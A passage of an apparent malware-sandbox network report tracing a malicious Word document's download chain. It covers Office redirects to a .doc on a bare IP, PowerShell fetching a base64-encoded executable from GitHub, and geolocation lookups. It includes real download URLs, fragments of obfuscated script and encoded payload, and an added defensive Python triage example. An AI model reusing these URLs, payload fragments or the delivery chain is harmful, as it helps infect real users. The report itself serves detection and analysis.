Oct 1, 2024 09:25:22.366895914 CEST | 1236 | IN | Data Raw: 00 20 00 3d 00 20 00 22 00 47 00 62 00 6b 00 4e 00 70 00 6b 00 42 00 6c 00 57 00 68 00 4f 00 57 00 57 00 49 00 55 00 4c 00 55 00 42 00 4b 00 4b 00 68 00 4e 00 47 00 6b 00 6f 00 4a 00 22 00 0d 00 0a 00 42 00 49 00 7a 00 4b 00 71 00 50 00 49 00 4b
Data Ascii: = "GbkNpkBlWhOWWIULUBKKhNGkoJ"BIzKqPIKnWxPZoxoKGfKULoCcW = "KdkWdLiBLdBnNTccPArWdPUfPf"eGcPHqLkOuLLZLpbSLGkLiOKhU =
Oct 1, 2024 09:25:22.366903067 CEST | 672 | IN | Data Raw: 00 6d 00 4c 00 6b 00 70 00 75 00 4c 00 4e 00 78 00 66 00 41 00 65 00 41 00 4b 00 63 00 47 00 4c 00 22 00 0d 00 0a 00 72 00 71 00 62 00 73 00 54 00 7a 00 51 00 6f 00 67 00 6b 00 63 00 68 00 70 00 67 00 6d 00 6b 00 78 00 54 00 41 00 6d 00 57 00 57
Data Ascii: mLkpuLNxfAeAKcGL"rqbsTzQogkchpgmkxTAmWWcPKN = "NULicPitNWNfGOlOsIjaWUSGZW"fLbCIzWblcgkWlbkWWoxWvWmZP = "xLLiqUNObsoUr
Oct 1, 2024 09:25:22.367078066 CEST | 1236 | IN | Data Raw: 00 4c 00 53 00 64 00 78 00 62 00 4f 00 4a 00 4c 00 62 00 57 00 20 00 3d 00 20 00 22 00 69 00 4c 00 57 00 50 00 4c 00 55 00 4b 00 70 00 69 00 4e 00 55 00 62 00 6f 00 4c 00 62 00 48 00 70 00 69 00 57 00 71 00 55 00 4c 00 65 00 4c 00 61 00 66 00 22
Data Ascii: LSdxbOJLbW = "iLWPLUKpiNUboLbHpiWqULeLaf"santistaioWRUZKmUWzLiCGZobceAHWi = "KieLLTfxHPcrPLWcBbfdWTGkQP"iLpCngeJKQqTU
Oct 1, 2024 09:25:22.367145061 CEST | 1236 | IN | Data Raw: 00 68 00 57 00 71 00 75 00 6b 00 4c 00 76 00 75 00 4b 00 6b 00 69 00 52 00 6e 00 53 00 4c 00 5a 00 51 00 6e 00 22 00 0d 00 0a 00 4b 00 63 00 62 00 57 00 66 00 65 00 52 00 6b 00 6b 00 65 00 57 00 5a 00 6c 00 52 00 66 00 69 00 6e 00 74 00 52 00 4e
Data Ascii: hWqukLvuKkiRnSLZQn"KcbWfeRkkeWZlRfintRNkGUzxp = "hkticfWWvKtcIfLPWkWUmhAlWh"IKcqqzWLiWiAeGjLoZInddIAac = "LNcGizhLzxW
Oct 1, 2024 09:25:22.367156982 CEST | 1236 | IN | Data Raw: 00 0a 00 4a 00 64 00 6c 00 50 00 4c 00 70 00 63 00 4b 00 71 00 68 00 57 00 71 00 4a 00 53 00 6b 00 50 00 65 00 69 00 50 00 41 00 64 00 70 00 64 00 74 00 74 00 6f 00 20 00 3d 00 20 00 22 00 71 00 57 00 62 00 57 00 4c 00 78 00 48 00 70 00 6e 00 78
Data Ascii: JdlPLpcKqhWqJSkPeiPAdpdtto = "qWbWLxHpnxKdhfuThZhcUklLhW"WBiLiKachZWSSWLKSScWmBpaiW = "LlntStmOrmpSitkcWhPKhoiGbW"LL
Oct 1, 2024 09:25:22.367225885 CEST | 1236 | IN | Data Raw: 00 68 00 20 00 3d 00 20 00 22 00 4b 00 5a 00 4b 00 52 00 55 00 4c 00 4c 00 69 00 67 00 47 00 69 00 49 00 4c 00 42 00 4c 00 65 00 4e 00 48 00 47 00 48 00 4a 00 50 00 63 00 63 00 52 00 42 00 22 00 0d 00 0a 00 55 00 75 00 6c 00 50 00 61 00 6d 00 55
                                                                                                                                Data Ascii: h = "KZKRULLigGiILBLeNHGHJPccRB"UulPamUqAUKWNmbNCeRacAWgcH = "kGLUCfNQmGOchZnkcKQizGCAWx"bdKLqfLWKGcsQbbfdLgAlZbpnK =
                                                                                                                                Oct 1, 2024 09:25:22.372024059 CEST1236INData Raw: 00 4c 00 4c 00 6d 00 41 00 69 00 22 00 0d 00 0a 00 47 00 68 00 57 00 69 00 71 00 5a 00 4a 00 75 00 78 00 6f 00 54 00 69 00 54 00 61 00 4e 00 63 00 53 00 4c 00 48 00 53 00 65 00 6e 00 4f 00 70 00 57 00 43 00 20 00 3d 00 20 00 22 00 52 00 42 00 63
                                                                                                                                Data Ascii: LLmAi"GhWiqZJuxoTiTaNcSLHSenOpWC = "RBckKoQlGLLALRIzLOGUvKnKKe"LWGoimffkWcZUffKLRiBpoUsCc = "tKqnLLzWCkNiLBlpBUpKhNKW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49171 | 104.168.7.8 | 80 | 4004 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 09:25:29.432153940 CEST | 73 | OUT | GET /510/RFGB.txt HTTP/1.1
Host: 104.168.7.8
Connection: Keep-Alive
Oct 1, 2024 09:25:30.001705885 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:29 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 01 Oct 2024 00:14:41 GMT
ETag: "a1000-6235f352a54ba"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49174 | 178.237.33.50 | 80 | 2136 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 09:25:34.168325901 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 1, 2024 09:25:34.799901009 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Tue, 01 Oct 2024 07:25:34 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 172.67.216.244 | 443 | 3348 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-01 07:25:06 UTC | 128 | OUT | OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: og1.in
Content-Length: 0
Connection: Keep-Alive
2024-10-01 07:25:07 UTC | 773 | IN | HTTP/1.1 200 OK
Date: Tue, 01 Oct 2024 07:25:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
allow: GET,HEAD
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ekKva5SgP5WafJDvfA3%2BH9PS%2Fm8b4SKru%2FqLduaP0qkRM5QoQVHTMv2u96RKeIN%2BI8fTnjVEVPDqGT92%2F%2BlNtQd5qNJbK0liLkDOSKu01M%2BKpHBs1g5EjEo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cbab7857c15c434-EWR
2024-10-01 07:25:07 UTC | 13 | IN | Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
Data Ascii: 8GET,HEAD
2024-10-01 07:25:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49162 | 172.67.216.244 | 443 | 3348 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-01 07:25:08 UTC | 113 | OUT | HEAD /9aubsm HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: og1.in
2024-10-01 07:25:09 UTC | 929 | IN | HTTP/1.1 302 Found
Date: Tue, 01 Oct 2024 07:25:09 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 182
Connection: close
location: http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc
strict-transport-security: max-age=15552000; includeSubDomains
vary: Accept
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=db%2FAd4k1Oqc5bPWwNRw2ijD2QAuGiZMDUCBijfuHoocJ0LlX0XaH7knKtNcEaBKuRaYMRK%2Bk64lA9Y2U5v3dD6k3yusIzpmzvuBUc1KRgpSGMLPWL8wxUrE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cbab78fd97e8c5d-EWR


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                2192.168.2.2249163172.67.216.244443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-10-01 07:25:12 UTC123OUTOPTIONS / HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                translate: f
                                                                                                                                Host: og1.in
                                                                                                                                2024-10-01 07:25:13 UTC765INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:13 GMT
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                allow: GET,HEAD
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W67wC14BOwR4yCIlpHA4bHlZBpqw3magRYADv03Cv55daQRM%2FzvAEK0xAvyIgcGLyPw4JVMPylimEAf%2BnLDZ5vStunhBSoUFxxCnVw0NAGOhSAsf%2BiUdBlU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7ac58ef8c41-EWR
2024-10-01 07:25:13 UTC | 13 | IN | Data Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
Data Ascii: 8GET,HEAD (one chunk of the chunked response: size line "8", chunk body "GET,HEAD"; the 0d 0a delimiters are not printable)
2024-10-01 07:25:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (zero-length terminating chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49166 | 172.67.216.244 | 443 | 3348 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-01 07:25:17 UTC | 343 | OUT | GET /9aubsm HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                UA-CPU: AMD64
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Host: og1.in
                                                                                                                                Connection: Keep-Alive
2024-10-01 07:25:18 UTC | 915 | IN | HTTP/1.1 302 Found
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:18 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 182
                                                                                                                                Connection: close
                                                                                                                                location: http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                vary: Accept
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 0
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVJgi0wYnSiij2erDfnzIKocjuhrIJF6BiqUN8RfQMGVZtOkT2AKn%2BInwy6mCyDZXTxLclaaSjAoQpYmZETZ9X3427VRvYVSOjQIyeFPFxEM80Me4K4Fc5Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7cadb514263-EWR
                                                                                                                                2024-10-01 07:25:18 UTC182INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 38 2f 35 31 30 2f 52 4e 2f 63 72 65 61 6d 62 61 6e 61 6e 61 63 61 6b 65 67 6f 6f 64 66 6f 72 6c 61 64 69 65 73 77 68 6f 6c 6f 76 65 74 68 65 62 61 6e 61 6e 61 73 61 6d 65 74 69 6d 65 73 68 65 6b 6e 6f 77 74 68 65 76 65 72 79 6e 69 63 65 69 64 65 61 64 73 6c 61 77 79 61 73 67 65 74 62 61 63 6b 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 6d 65 5f 5f 5f 5f 73 65 63 75 72 65 74 68 69 6e 67 73 61 72 65 69 6e 74 68 72 2e 64 6f 63
                                                                                                                                Data Ascii: Found. Redirecting to http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49168 | 172.67.216.244 | 443 | 3348 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-10-01 07:25:20 UTC | 132 | OUT | HEAD /9aubsm HTTP/1.1
                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                Host: og1.in
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: Keep-Alive
2024-10-01 07:25:21 UTC | 935 | IN | HTTP/1.1 302 Found
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:21 GMT
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                Content-Length: 182
                                                                                                                                Connection: close
                                                                                                                                location: http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc
                                                                                                                                strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                vary: Accept
                                                                                                                                x-content-type-options: nosniff
                                                                                                                                x-dns-prefetch-control: off
                                                                                                                                x-download-options: noopen
                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yobdsxMxZhBha2gOS49UQKABkBSgRkwxyHrqf%2B5eUy%2BI9i%2BUx5HUz%2FW58pNVC%2BcIm5COMK2UE9ub03L9P9sLwPssKu9XqY5yPZwfpuHKvit2uKBzkRCyQCI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8cbab7dc38264362-EWR
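Sessions 3 and 4 are the remote-resource fetch that the "Office viewer loads remote template" / "Contains an external reference to another file" signatures refer to: WINWORD.EXE (PID 3348) requests the og1.in short link with its own ms-office User-Agent, then re-probes it with the HEAD request Office sends under the "Microsoft Office Existence Discovery" User-Agent, and the server answers both with a 302 to an http:// .doc on a bare IP (104.168.7.8). The following is an added example of turning that chain into proxy-log triage logic; it is not Joe Sandbox code, and the session records are constructed from the fields visible above (the benign record is invented for contrast). The first rule also fires for legitimate templates on an intranet server, so the redirect rules are what should drive severity.

```python
"""Triage HTTP sessions for the Office external-resource fetch chain.

Added example, not Joe Sandbox code.  SESSIONS is constructed from the
process, method, User-Agent, status and Location fields shown in the
report; session 9 is an invented benign record.
"""
import ipaddress
from urllib.parse import urlsplit

# Office binaries that should not normally be fetching documents over HTTP on their own
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# What a remote-template / external-reference redirect usually resolves to
DOCUMENT_EXTENSIONS = (".doc", ".docx", ".dot", ".dotm", ".rtf")
EXISTENCE_DISCOVERY_UA = "Microsoft Office Existence Discovery"


def is_bare_ip(host: str) -> bool:
    """True if the URL host is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_session(session: dict) -> list:
    """Return the indicator names that fire for one HTTP session, in rule order."""
    findings = []
    process = session["process"].rsplit("\\", 1)[-1].lower()
    ua = session.get("user_agent", "")

    # An Office process speaking HTTP with its own UA, or sending the
    # Existence Discovery HEAD probe, means the document referenced an
    # external resource (remote template, INCLUDEPICTURE, OLE link, ...).
    if process in OFFICE_PROCESSES and ("ms-office" in ua or ua == EXISTENCE_DISCOVERY_UA):
        findings.append("office-external-resource-fetch")

    location = session.get("location")
    if location:
        target = urlsplit(location)
        if is_bare_ip(target.hostname or ""):
            findings.append("redirect-to-bare-ip")
        if target.path.lower().endswith(DOCUMENT_EXTENSIONS):
            findings.append("redirect-to-document")
        if target.scheme == "http":
            findings.append("redirect-downgrade-to-http")
    return findings


def triage(sessions: list) -> dict:
    """Map session id -> findings for a batch of session records."""
    return {s["id"]: analyze_session(s) for s in sessions}


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
OFFICE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
             ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)")
REDIRECT = ("http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametime"
            "sheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc")

# Constructed from the report's sessions 3 and 4; session 9 is an invented benign control.
SESSIONS = [
    {"id": 3, "process": WINWORD, "method": "GET", "host": "og1.in", "path": "/9aubsm",
     "user_agent": OFFICE_UA, "status": 302, "location": REDIRECT},
    {"id": 4, "process": WINWORD, "method": "HEAD", "host": "og1.in", "path": "/9aubsm",
     "user_agent": EXISTENCE_DISCOVERY_UA, "status": 302, "location": REDIRECT},
    {"id": 9, "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "method": "GET", "host": "example.com", "path": "/",
     "user_agent": "Mozilla/5.0 Chrome/128.0", "status": 200},
]

if __name__ == "__main__":
    for sid, hits in triage(SESSIONS).items():
        print(sid, hits or "-")
```

Feed it one record per request/response pair (process attribution comes from the sandbox or an endpoint agent, not from the proxy alone); a session that collects the full set of four indicators, as sessions 3 and 4 do here, is the pattern worth an automatic escalation.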


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49170 | 185.199.111.133 | 443 | 4004 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-01 07:25:27 UTC | 128 | OUT | GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                Connection: Keep-Alive
2024-10-01 07:25:27 UTC | 901 | IN | HTTP/1.1 200 OK
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 2935468
                                                                                                                                Cache-Control: max-age=300
                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                X-Frame-Options: deny
                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                X-GitHub-Request-Id: 5BED:6BAD6:C83CD5:D815A5:66FB95B1
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:27 GMT
                                                                                                                                Via: 1.1 varnish
                                                                                                                                X-Served-By: cache-ewr-kewr1740073-EWR
                                                                                                                                X-Cache: HIT
                                                                                                                                X-Cache-Hits: 0
                                                                                                                                X-Timer: S1727767527.093306,VS0,VE62
                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                X-Fastly-Request-ID: ad9fec078881041da13a71528738b5c3e7efe8e0
                                                                                                                                Expires: Tue, 01 Oct 2024 07:30:27 GMT
                                                                                                                                Source-Age: 0
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                2024-10-01 07:25:27 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
